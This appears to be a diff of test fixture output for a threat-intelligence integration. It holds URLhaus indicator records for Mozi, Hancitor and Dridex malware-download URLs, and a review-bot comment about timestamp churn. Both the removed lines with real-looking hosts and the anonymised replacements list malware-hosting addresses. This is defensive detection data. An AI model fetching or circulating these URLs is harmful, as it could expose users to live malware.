- "original": "{\"id\":\"961227\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961227/\",\"url\":\"http://116.75.197.63:46654/Mozi.a\",\"url_status\":\"online\",\"host\":\"116.75.197.63\",\"date_added\":\"2021-01-14 18:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026785100Z",
+ "original": "{\"id\":\"961227\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961227/\",\"url\":\"http://89.160.20.156:46654/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -15476,18 +15476,18 @@
"url": {
"path": "/Mozi.m",
"extension": "m",
- "original": "http://115.55.33.224:59073/Mozi.m",
+ "original": "http://89.160.20.156:59073/Mozi.m",
"scheme": "http",
"port": 59073,
- "domain": "115.55.33.224",
- "full": "http://115.55.33.224:59073/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:59073/Mozi.m"
},
- "ip": "115.55.33.224"
+ "ip": "89.160.20.156"
}
},
"event": {
- "ingested": "2021-12-13T06:08:08.693701977Z",
- "original": "{\"id\":\"961228\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961228/\",\"url\":\"http://115.55.33.224:59073/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.55.33.224\",\"date_added\":\"2021-01-14 18:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026792100Z",
+ "original": "{\"id\":\"961228\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961228/\",\"url\":\"http://89.160.20.156:59073/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -15525,18 +15525,18 @@
"url": {
"path": "/Mozi.a",
"extension": "a",
- "original": "http://116.75.192.61:37958/Mozi.a",
+ "original": "http://89.160.20.156:37958/Mozi.a",
"scheme": "http",
"port": 37958,
- "domain": "116.75.192.61",
- "full": "http://116.75.192.61:37958/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:37958/Mozi.a"
},
- "ip": "116.75.192.61"
+ "ip": "89.160.20.156"
}
},
"event": {
- "ingested": "2021-12-13T06:08:08.693705303Z",
- "original": "{\"id\":\"961221\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961221/\",\"url\":\"http://116.75.192.61:37958/Mozi.a\",\"url_status\":\"offline\",\"host\":\"116.75.192.61\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026798900Z",
+ "original": "{\"id\":\"961221\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961221/\",\"url\":\"http://89.160.20.156:37958/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
"category": "threat",
"type": "indicator",
"kind": "enrichment"
@@ -15574,18 +15574,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://119.178.250.25:53943/Mozi.m", + "original": "http://89.160.20.156:53943/Mozi.m", "scheme": "http", "port": 53943, - "domain": "119.178.250.25", - "full": "http://119.178.250.25:53943/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53943/Mozi.m" }, - "ip": "119.178.250.25" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693708920Z", - "original": "{\"id\":\"961222\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961222/\",\"url\":\"http://119.178.250.25:53943/Mozi.m\",\"url_status\":\"online\",\"host\":\"119.178.250.25\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026805800Z", + "original": "{\"id\":\"961222\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961222/\",\"url\":\"http://89.160.20.156:53943/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -15623,18 +15623,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.59.212.117:40404/Mozi.m", + "original": "http://89.160.20.156:40404/Mozi.m", "scheme": "http", "port": 40404, - "domain": "115.59.212.117", - "full": "http://115.59.212.117:40404/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40404/Mozi.m" }, - "ip": "115.59.212.117" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693712266Z", - "original": "{\"id\":\"961223\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961223/\",\"url\":\"http://115.59.212.117:40404/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.59.212.117\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026812700Z", + "original": "{\"id\":\"961223\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961223/\",\"url\":\"http://89.160.20.156:40404/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -15672,18 +15672,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.114.210.156:46738/Mozi.m", + "original": "http://89.160.20.156:46738/Mozi.m", "scheme": "http", "port": 46738, - "domain": "182.114.210.156", - "full": "http://182.114.210.156:46738/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:46738/Mozi.m" }, - "ip": "182.114.210.156" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693715662Z", - "original": "{\"id\":\"961224\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961224/\",\"url\":\"http://182.114.210.156:46738/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.114.210.156\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026819600Z", + "original": "{\"id\":\"961224\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961224/\",\"url\":\"http://89.160.20.156:46738/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -15721,18 +15721,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.12.231.116:58234/Mozi.m", + "original": "http://89.160.20.156:58234/Mozi.m", "scheme": "http", "port": 58234, - "domain": "123.12.231.116", - "full": "http://123.12.231.116:58234/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:58234/Mozi.m" }, - "ip": "123.12.231.116" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693718898Z", - "original": "{\"id\":\"961225\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961225/\",\"url\":\"http://123.12.231.116:58234/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.12.231.116\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026826400Z", + "original": "{\"id\":\"961225\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961225/\",\"url\":\"http://89.160.20.156:58234/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -15770,18 +15770,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://182.59.230.66:36911/Mozi.a", + "original": "http://89.160.20.156:36911/Mozi.a", "scheme": "http", "port": 36911, - "domain": "182.59.230.66", - "full": "http://182.59.230.66:36911/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36911/Mozi.a" }, - "ip": "182.59.230.66" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693722004Z", - "original": "{\"id\":\"961226\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961226/\",\"url\":\"http://182.59.230.66:36911/Mozi.a\",\"url_status\":\"online\",\"host\":\"182.59.230.66\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026833400Z", + "original": "{\"id\":\"961226\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961226/\",\"url\":\"http://89.160.20.156:36911/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -15819,18 +15819,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.207.21.23:35028/Mozi.m", + "original": "http://89.160.20.156:35028/Mozi.m", "scheme": "http", "port": 35028, - "domain": "115.207.21.23", - "full": "http://115.207.21.23:35028/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35028/Mozi.m" }, - "ip": "115.207.21.23" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693725340Z", - "original": "{\"id\":\"961220\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961220/\",\"url\":\"http://115.207.21.23:35028/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.207.21.23\",\"date_added\":\"2021-01-14 18:49:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026840400Z", + "original": "{\"id\":\"961220\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961220/\",\"url\":\"http://89.160.20.156:35028/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:49:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -15877,7 +15877,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.693728476Z", + "ingested": "2021-12-13T08:40:08.026847300Z", "original": "{\"id\":\"961219\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961219/\",\"url\":\"http://allanabolicsteam.net/nedfr_.exe\",\"url_status\":\"offline\",\"host\":\"allanabolicsteam.net\",\"date_added\":\"2021-01-14 18:47:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"abused_legit_malware\",\"surbl\":\"not listed\"},\"reporter\":\"Myrtus0x0\",\"larted\":\"true\",\"tags\":[\"c2\",\"hancitor\",\"payload\"]}", "category": "threat", "type": "indicator", @@ -15923,7 +15923,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.693731722Z", + "ingested": "2021-12-13T08:40:08.026854400Z", "original": "{\"id\":\"961217\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961217/\",\"url\":\"https://intranetstc.micromart.com.br/fined.php\",\"url_status\":\"offline\",\"host\":\"intranetstc.micromart.com.br\",\"date_added\":\"2021-01-14 18:47:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"0x49736b\",\"larted\":\"false\",\"tags\":[\"Dridex\"]}", "category": "threat", "type": "indicator", @@ -15971,7 +15971,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.693735049Z", + "ingested": "2021-12-13T08:40:08.026861300Z", "original": "{\"id\":\"961218\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961218/\",\"url\":\"http://allanabolicsteam.net/1301s.bin\",\"url_status\":\"online\",\"host\":\"allanabolicsteam.net\",\"date_added\":\"2021-01-14 18:47:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"abused_legit_malware\",\"surbl\":\"not listed\"},\"reporter\":\"Myrtus0x0\",\"larted\":\"true\",\"tags\":[\"c2\",\"hancitor\",\"payload\"]}", "category": "threat", "type": "indicator", 
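Review bot: Expected-output churn is the concern in the three hunks here: event.ingested is the only field that differs, and it is rewritten in every other hunk of this section as well, so the file changes on each regeneration even where the fixture is untouched. The fractional-second precision also varies between records (nine digits with trailing zeros in most hunks, six in the 16256 and 16305 hunks), which suggests the value reflects the machine that produced the file rather than the pipeline under test. If the test runner can ignore or normalise dynamic fields, event.ingested is a candidate; otherwise stripping it before comparison would make a fixture diff show only fixture changes.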
@@ -16010,18 +16010,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://61.53.222.100:43741/i", + "original": "http://89.160.20.156:43741/i", "scheme": "http", "port": 43741, - "domain": "61.53.222.100", - "full": "http://61.53.222.100:43741/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43741/i" }, - "ip": "61.53.222.100" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693738124Z", - "original": "{\"id\":\"961216\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961216/\",\"url\":\"http://61.53.222.100:43741/i\",\"url_status\":\"online\",\"host\":\"61.53.222.100\",\"date_added\":\"2021-01-14 18:44:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.026868200Z", + "original": "{\"id\":\"961216\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961216/\",\"url\":\"http://89.160.20.156:43741/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:44:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -16060,18 +16060,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://42.225.52.44:45803/bin.sh", + "original": "http://89.160.20.156:45803/bin.sh", "scheme": "http", "port": 45803, - "domain": "42.225.52.44", - "full": "http://42.225.52.44:45803/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:45803/bin.sh" }, - "ip": "42.225.52.44" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693741431Z", - "original": "{\"id\":\"961215\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961215/\",\"url\":\"http://42.225.52.44:45803/bin.sh\",\"url_status\":\"offline\",\"host\":\"42.225.52.44\",\"date_added\":\"2021-01-14 18:41:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"false\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.026875200Z", + "original": "{\"id\":\"961215\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961215/\",\"url\":\"http://89.160.20.156:45803/bin.sh\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:41:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"false\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -16109,18 +16109,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://191.242.38.33:38611/Mozi.m", + "original": "http://89.160.20.156:38611/Mozi.m", "scheme": "http", "port": 38611, - "domain": "191.242.38.33", - "full": "http://191.242.38.33:38611/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38611/Mozi.m" }, - "ip": "191.242.38.33" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693744807Z", - "original": "{\"id\":\"961214\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961214/\",\"url\":\"http://191.242.38.33:38611/Mozi.m\",\"url_status\":\"offline\",\"host\":\"191.242.38.33\",\"date_added\":\"2021-01-14 18:36:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026882200Z", + "original": "{\"id\":\"961214\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961214/\",\"url\":\"http://89.160.20.156:38611/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -16158,18 +16158,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.97.171.225:35185/Mozi.m", + "original": "http://89.160.20.156:35185/Mozi.m", "scheme": "http", "port": 35185, - "domain": "59.97.171.225", - "full": "http://59.97.171.225:35185/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35185/Mozi.m" }, - "ip": "59.97.171.225" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693748093Z", - "original": "{\"id\":\"961213\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961213/\",\"url\":\"http://59.97.171.225:35185/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.97.171.225\",\"date_added\":\"2021-01-14 18:36:12 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026889200Z", + "original": "{\"id\":\"961213\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961213/\",\"url\":\"http://89.160.20.156:35185/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:12 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -16207,18 +16207,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://189.51.102.115:35054/Mozi.m", + "original": "http://89.160.20.156:35054/Mozi.m", "scheme": "http", "port": 35054, - "domain": "189.51.102.115", - "full": "http://189.51.102.115:35054/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35054/Mozi.m" }, - "ip": "189.51.102.115" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693751319Z", - "original": "{\"id\":\"961212\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961212/\",\"url\":\"http://189.51.102.115:35054/Mozi.m\",\"url_status\":\"offline\",\"host\":\"189.51.102.115\",\"date_added\":\"2021-01-14 18:36:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026896100Z", + "original": "{\"id\":\"961212\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961212/\",\"url\":\"http://89.160.20.156:35054/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -16256,18 +16256,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.235.186.115:60038/Mozi.m", + "original": "http://89.160.20.156:60038/Mozi.m", "scheme": "http", "port": 60038, - "domain": "42.235.186.115", - "full": "http://42.235.186.115:60038/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60038/Mozi.m" }, - "ip": "42.235.186.115" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693755517Z", - "original": "{\"id\":\"961207\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961207/\",\"url\":\"http://42.235.186.115:60038/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.235.186.115\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026903Z", + "original": "{\"id\":\"961207\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961207/\",\"url\":\"http://89.160.20.156:60038/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -16305,18 +16305,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://219.157.134.199:52253/Mozi.m", + "original": "http://89.160.20.156:52253/Mozi.m", "scheme": "http", "port": 52253, - "domain": "219.157.134.199", - "full": "http://219.157.134.199:52253/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52253/Mozi.m" }, - "ip": "219.157.134.199" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693759104Z", - "original": "{\"id\":\"961208\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961208/\",\"url\":\"http://219.157.134.199:52253/Mozi.m\",\"url_status\":\"online\",\"host\":\"219.157.134.199\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026910Z", + "original": "{\"id\":\"961208\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961208/\",\"url\":\"http://89.160.20.156:52253/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -16354,18 +16354,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://221.14.21.135:43125/Mozi.m", + "original": "http://89.160.20.156:43125/Mozi.m", "scheme": "http", "port": 43125, - "domain": "221.14.21.135", - "full": "http://221.14.21.135:43125/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43125/Mozi.m" }, - "ip": "221.14.21.135" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693762470Z", - "original": "{\"id\":\"961209\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961209/\",\"url\":\"http://221.14.21.135:43125/Mozi.m\",\"url_status\":\"online\",\"host\":\"221.14.21.135\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026916900Z", + "original": "{\"id\":\"961209\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961209/\",\"url\":\"http://89.160.20.156:43125/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
